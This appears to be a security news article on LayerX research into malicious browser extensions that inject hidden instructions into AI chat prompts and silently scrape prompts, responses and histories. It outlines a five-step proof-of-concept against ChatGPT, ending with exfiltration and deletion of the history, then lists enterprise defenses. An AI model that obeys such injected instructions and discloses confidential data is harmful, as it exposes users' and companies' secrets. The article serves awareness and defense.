Malicious Browser Extensions Exploit AI Prompts to Steal Sensitive Data
Share this article
That seemingly harmless browser extension you installed could be weaponizing AI to steal your data. According to new research from browser security firm LayerX, malicious extensions can exploit the Document Object Model (DOM) access inherent in web-based AI tools to read, alter, and exfiltrate sensitive information from prompts and responses—without requiring any special permissions. This vulnerability threatens both consumer privacy and enterprise security, with internal proprietary data like source code or M&A plans at particular risk.
The Silent Data Exfiltration Mechanism
Generative AI tools like ChatGPT, Google Gemini, Microsoft Copilot, and internal corporate LLMs render user prompts within the browser's DOM. LayerX discovered that any extension with scripting capabilities can directly interact with these prompts, enabling two primary attack vectors:
1. Prompt Injection: Malicious extensions can inject hidden instructions into the user's query, manipulating the AI's response to disclose confidential data.
2. Data Theft: Extensions can silently scrape the original prompt, the AI's response, or entire conversation histories containing sensitive information.
LayerX demonstrated a proof-of-concept attack chain targeting ChatGPT:
1. A user installs a compromised extension needing no special permissions.
2. The attacker's command-and-control server sends an instruction to the extension.
3. The extension opens a hidden background tab and queries ChatGPT.
4. Results (stolen data) are sent to an external server.
5. The extension deletes the conversation history, leaving no trace.
How browser extensions can exploit AI to steal your data and how to protect yourself. (Image: Elyse Betters Picaro / ZDNET)
Enterprise Impact and Existing Vulnerabilities
The threat escalates in business environments. Employees copying regulated data or internal secrets into AI prompts create high-value targets. Compounding the risk, LayerX identified legitimate extensions like Prompt Archer, Prompt Manager, and PromptFolder already possess the DOM access capabilities needed for such attacks, highlighting how easily functionality can be repurposed maliciously. The researchers confirmed successful exploits against all top commercial LLMs, emphasizing that internal AI tools are equally vulnerable.
Building Defenses: From Chrome Enterprise to Vigilance
LayerX has collaborated with Google to integrate its extension risk scoring technology directly into Chrome for Enterprise. This solution analyzes permissions, publisher reputation, code behavior, and usage patterns to assign real-time risk scores, visible in enterprise management dashboards. IT admins can proactively block high-risk extensions.
Key protective measures for organizations include:
* Monitoring DOM Interactions: Actively track listeners and webhooks interacting with AI prompts.
* Dynamic Sandboxing: Restrict extension capabilities based on real-time risk assessment, not just static allow lists.
* Leverage Free Tools: Use LayerX's ExtensionPedia database to evaluate the security of over 200,000 extensions across Chrome, Firefox, and Edge.
For individual users, extreme caution with extension installation remains paramount. This exploit underscores a critical convergence of AI adoption and browser extension risks—demanding heightened security awareness as generative tools become embedded in daily workflows. The silent nature of these attacks, leaving no logs, makes proactive defense not just advisable, but essential for safeguarding the integrity of human-AI interactions.